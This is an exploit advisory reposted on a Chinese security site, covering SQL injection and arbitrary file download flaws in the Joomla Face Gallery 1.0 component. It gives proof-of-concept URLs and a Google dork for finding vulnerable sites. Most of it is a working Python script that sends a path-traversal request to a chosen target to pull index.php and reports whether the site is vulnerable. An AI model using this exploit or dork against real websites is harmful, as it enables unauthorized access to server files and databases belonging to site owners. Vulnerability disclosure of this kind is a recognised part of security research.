Joomla Face Gallery 1.0 Multiple Vulnerabilities

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Joomla Face Gallery 1.0 Multiple Vulnerabilities

来源：http://www.homelab.it 作者：Viviani 发布时间：2014-09-23

######################

# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://www.apptha.com

# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150

# Dork Google: inurl:option=com_facegallery

# Date : 2014-09-17

# Tested on : Windows 7 / Mozilla Firefox

# Linux / Mozilla Firefox

# Info:

# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities

# PoC Exploit:

#

# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en

# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]

# "aid" and img_name variables are not sanitized.

######################

# Arbitrary file download exploit:

#!/usr/bin/env python

# http connection

import urllib, urllib2

# Args management

import optparse

# Error managemen

import sys

banner = """

__ __ _______

|__.-----.-----.--------| .---.-. | _ .---.-.----.-----.

| | _ | _ | | | _ | |. 1___| _ | __| -__|

| |_____|_____|__|__|__|__|___._| |. __) |___._|____|_____|

|___| |: |

|::.|

`---'

_______ __ __ _____ _______

| _ .---.-| | .-----.----.--.--. | _ | | _ |

|. |___| _ | | | -__| _| | | |.| |__|. | |

|. | |___._|__|__|_____|__| |___ | `-|. |__|. | |

|: 1 | |_____| |: | |: 1 |

|::.. . | |::.| |::.. . |

`-------' `---' `-------'

j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it

homelabit@protonmail.ch

https://www.facebook.com/homelabit

https://twitter.com/homelabit

https://plus.google.com/+HomelabIt1/

https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""

# Check url

def checkurl(url):

if url[:8] != "https://" and url[:7] != "http://":

print('[X] You must insert http:// or https:// procotol')

sys.exit(1)

else:

return url

def connection(url,pathtrav):

try:

response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php')

content = response.read()

if content != "":

print '[!] VULNERABLE'

print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php'

else:

print '[X] Not Vulnerable'

except urllib2.HTTPError:

print '[X] HTTP Error'

except urllib2.URLError:

print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t URL')

commandList.add_option('-t', '--target', action="store",

help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",

)

options, remainder = commandList.parse_args()

# Check args

if not options.target:

print(banner)

commandList.print_help()

sys.exit(1)

print(banner)

url = checkurl(options.target)

pathtrav = "../../"

connection(url,pathtrav)

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告